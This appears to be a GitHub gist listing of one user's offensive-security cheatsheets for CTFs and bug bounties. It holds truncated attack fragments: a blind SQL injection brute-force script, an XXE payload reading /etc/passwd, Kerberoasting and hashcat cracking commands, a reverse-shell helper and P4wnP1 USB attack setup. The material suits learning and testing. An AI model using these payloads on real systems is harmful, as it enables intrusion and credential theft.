@AvasDream
AvasDream / bbcheatsheet.md
Last active October 12, 2019 14:24
Bug Bounty Cheatsheet

Reconnaissance

DNS Recon

DNS Record Types:

A (Host address)
AAAA (IPv6 host address)
ALIAS (Auto resolved alias)
@AvasDream
AvasDream / snippets.md
Last active March 14, 2019 18:16
Python Hacking Snippets

Blind boolean-based UNION SQL injection brute-forcing

#!/usr/bin/python3
import requests
import timeit

start = timeit.default_timer()
URL = "http://35.227.24.107:5001/b3838cbb72/login"
QUERY = "admin' union select password from admins where id=1 and password like \""
@AvasDream
AvasDream / zabbix.sh
Last active November 23, 2019 09:08
Easy install script for Zabbix 4.0 on Ubuntu 16.04 Server; also works with Ubuntu 18.04 but needs the 16.04 PPA in sources.list
#!/bin/bash
version=4.0.2
echo "execute with sudo privileges"
sudo true
echo "Install GCC"
sudo apt install gcc -y > /dev/null
echo "Install make"
sudo apt install make -y > /dev/null
echo "install postgresql server"
@AvasDream
AvasDream / revshell.md
Last active May 29, 2019 15:08
Bash function to create a reverse shell from the tun0 interface. Might come in handy in CTFs or HackTheBox.
  • Create msf rc file for standard msfvenom binaries
function revshell() {
# $1 language
# Default tun0 1337

INF=tun0
PORT=1337
@AvasDream
AvasDream / String-manipulation.md
Last active October 14, 2018 12:53
My personal cheatsheet for string manipulation in Linux

From upper to lowercase

cat string | tr '[:upper:]' '[:lower:]'

Cut spaces from string

tr -d ' '

@AvasDream
AvasDream / privesc.md
Last active October 8, 2018 13:35
Resources for privilege escalation.

Windows Kerberoasting

Only possible with valid credentials and Kerberos.

GetUserSPNs.py -request -dc-ip IP DOMAIN/USER

Retrieve hash with Impacket.

hashcat -m 13100 --force -a 0 keberos_hash /usr/share/wordlists/rockyou.txt

@AvasDream
AvasDream / p4wnpi.md
Last active September 24, 2018 15:16
P4wnPi Setup

Project

P4wnP1 is a highly customizable USB attack platform, based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W (required for HID backdoor). Link to Repository

Installation

Copy image to SD card

dd if=<Source> of=<destination> bs=512 status=progress

Script for easier installation of Kali tools

Missing Browser Extensions!

  • Built with
  • Foxy Proxy
  • Cache Cleaner
  • Adblocker

Manual execution of install Scripts for Veil and Empire needed.

#! /bin/bash

Introduction

To better grasp the understanding of buffer overflows, I decided to make and document some exercises on this topic.

The exploit exercises are mainly from exploit-exercises.com.

Stack overflow - When the execution stack grows beyond the memory that is reserved for it.

Buffer overflow - When a program writes beyond the end of the memory allocated for any buffer (heap and stack).

@AvasDream
AvasDream / XML-external-entity-script.md
Last active July 7, 2018 10:27
Helper script for exploiting XXE

Basics

Source

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds>
    <user>&xxe;</user>
 mypass